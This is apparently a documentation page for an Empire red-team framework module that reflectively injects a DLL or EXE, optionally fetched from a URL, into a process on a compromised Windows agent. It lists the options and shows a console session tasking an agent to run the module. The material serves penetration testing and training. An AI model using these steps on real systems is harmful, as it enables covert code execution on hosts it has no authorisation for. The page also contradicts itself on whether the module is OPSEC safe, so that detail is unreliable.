Invoke-ReflectivePEInjection - Empire Module


This page contains detailed information about how to use the powershell/code_execution/invoke_reflectivepeinjection Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview

Name: Invoke-ReflectivePEInjection
Module: powershell/code_execution/invoke_reflectivepeinjection
Source code [1]: empire/server/modules/powershell/code_execution/invoke_reflectivepeinjection.yaml
Source code [2]: empire/server/modules/powershell/code_execution/invoke_reflectivepeinjection.py
MITRE ATT&CK: T1055, S0194
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: No

The invoke_reflectivepeinjection module uses PowerSploit's Invoke-ReflectivePEInjection to reflectively load a DLL/EXE in to the PowerShell process or reflectively load a DLL in to a remote process.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the invoke_reflectivepeinjection module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options

This is a list of options that are required by the invoke_reflectivepeinjection module:

Agent
Agent to run module on.

ForceASLR
Optional, will force the use of ASLR on the PE being loaded even if the PE indicates it doesn't support ASLR.
Default value: False.

Additional Module Options

This is a list of additional options that are supported by the invoke_reflectivepeinjection module:

ComputerName
Optional an array of computernames to run the script on.

DllPath
(Attacker) local path for the PE/DLL to load.

ExeArgs
Optional arguments to pass to the executable being reflectively loaded.

PEUrl
A URL containing a DLL/EXE to load and execute.

ProcId
Process ID of the process you want to inject a Dll into.

Invoke_reflectivepeinjection Example Usage

Here's an example of how to use the invoke_reflectivepeinjection module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/code_execution/invoke_reflectivepeinjection

 Author       @JosephBialek                                                          
 Background   False                                                                  
 Comments     https://github.com/mattifestation/PowerSploit/blob/master/CodeExecutio 
              n/Invoke-ReflectivePEInjection.ps1                                     
 Description  Uses PowerSploit's Invoke-ReflectivePEInjection to reflectively load a 
              DLL/EXE in to the PowerShell process or reflectively load a DLL in to  
              a remote process.                                                      
 Language     powershell                                                             
 Name         powershell/code_execution/invoke_reflectivepeinjection                 
 NeedsAdmin   False                                                                  
 OpsecSafe    True                                                                   
 Software     http://attack.mitre.org/software/S0194                                 
 Techniques   http://attack.mitre.org/techniques/T1055                               


,Record Optionsw-------,----------,-------------------------------------,
| Name         | Value | Required | Description                         |
|--------------|-------|----------|-------------------------------------|
| Agent        |       | True     | Agent to run module on.             |
|--------------|-------|----------|-------------------------------------|
| ComputerName |       | False    | Optional an array of computernames  |
|              |       |          | to run the script on.               |
|--------------|-------|----------|-------------------------------------|
| DllPath      |       | False    | (Attacker) local path for the       |
|              |       |          | PE/DLL to load.                     |
|--------------|-------|----------|-------------------------------------|
| ExeArgs      |       | False    | Optional arguments to pass to the   |
|              |       |          | executable being reflectively       |
|              |       |          | loaded.                             |
|--------------|-------|----------|-------------------------------------|
| ForceASLR    | False | True     | Optional, will force the use of     |
|              |       |          | ASLR on the PE being loaded even if |
|              |       |          | the PE indicates it doesn't support |
|              |       |          | ASLR.                               |
|--------------|-------|----------|-------------------------------------|
| PEUrl        |       | False    | A URL containing a DLL/EXE to load  |
|              |       |          | and execute.                        |
|--------------|-------|----------|-------------------------------------|
| ProcId       |       | False    | Process ID of the process you want  |
|              |       |          | to inject a Dll into.               |
'--------------'-------'----------'-------------------------------------'

(Empire: usemodule/powershell/code_execution/invoke_reflectivepeinjection) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/code_execution/invoke_reflectivepeinjection) > set ForceASLR False
[*] Set ForceASLR to False
(Empire: usemodule/powershell/code_execution/invoke_reflectivepeinjection) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author

References

See Also

Check also the following modules related to this module:

Version

This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.